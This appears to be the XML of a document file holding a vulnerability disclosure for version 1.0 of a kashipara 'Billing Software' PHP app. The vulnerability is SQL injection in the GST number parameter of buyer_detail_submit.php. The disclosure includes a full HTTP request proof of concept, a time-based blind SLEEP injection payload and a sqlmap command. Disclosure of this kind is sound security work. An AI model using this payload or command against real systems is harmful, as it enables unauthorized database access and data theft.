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28"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BILLING SOFTWARE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL injection vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18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Vulnerability Description: BILLING SOFTWARE SQL injection vulnerability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Manufacturer Information: www.kashipara.com/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Affected Version: 1.0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Environment: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Download Source Code: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https://www.kashipara.com/project/download/project2/user/2023/202310/kashipara.com_billing-software-zip.zip </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="194945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Code Analysis: </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2807335"/>
            <wp:effectExtent l="0" t="0" r="825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</w:rPr>
        <w:t xml:space="preserve"> Insufficient validation and filtering of the gsn_no parameter allows attackers to create a malicious request </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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POC：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping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 /billing/buyer_detail_submit.php HTTP/1.1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Host: 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Content-Length: 130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Cache-Control: max-age=0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sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"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sec-ch-ua-mobile: ?0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sec-ch-ua-platform: "Windows"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Upgrade-Insecure-Requests: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Origin: http://localhost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Content-Type: application/x-www-form-urlencoded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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Sec-Fetch-Site: same-origin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Sec-Fetch-Mode: navigate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Sec-Fetch-User: ?1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Sec-Fetch-Dest: document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Referer: http://localhost/billing/buyer_details.php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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: USER_NAME_COOKIE=admin; SID_1=aa141d36; mailpoet_page_view=%7B%22timestamp%22%3A1694409700%7D; mailpoet_subscriber=%7B%22subscriber_id%22%3A2%7D; _ga=GA1.1.324136046.1702458922; Hm_lvt_6a3c7d9bb52a48ffadde32007d2a259e=1702459185; _pk_id.1.1fff=4343a030b8a53617.1702459185.; PHPSESSID=vcssfak4odk78ee70p6p0ee04m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Connection: close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buyer_name=aaa&amp;contact=aaa&amp;gstn_no=123131231123&amp;pan_no=aqaq&amp;cin_no=13131&amp;buyer_address=312312313&amp;entry_date=09-01-2024&amp;submit=Save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Sqlmap：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="841375"/>
            <wp:effectExtent l="0" t="0" r="1460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Payload: buyer_name=aaa&amp;contact=aaa&amp;gstn_no=123131231123' AND (SELECT 4269 FROM (SELECT(SLEEP(5)))xaUJ) AND 'Bwew'='Bwew&amp;pan_no=aqaq&amp;cin_no=13131&amp;buyer_address=312312313&amp;entry_date=09-01-2024&amp;submit=Save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sqlmap.py -r 2.txt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0MDc5NGIyODkyNjRhMTU0MDRkMjk0YzQ0YWYwMjMifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="58C00AAD"/>
    <w:rsid w:val="07723089"/>
    <w:rsid w:val="204333BD"/>
    <w:rsid w:val="392179D8"/>
    <w:rsid w:val="39E524BC"/>
    <w:rsid w:val="3A383C6C"/>
    <w:rsid w:val="40390DB6"/>
    <w:rsid w:val="43814D21"/>
    <w:rsid w:val="58C0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  <w:style w:type="character" w:styleId="8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2023-11-03T05:03:00Z</dcterms:created>
  <dc:creator>WPS_1645946387</dc:creator>
  <cp:lastModifiedBy>WPS_1645946387</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-11T09:26:29Z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824DB65E37A3451EB1E3683A24DB9298_13</vt:lpwstr>
  </property>
</Properties>
</file>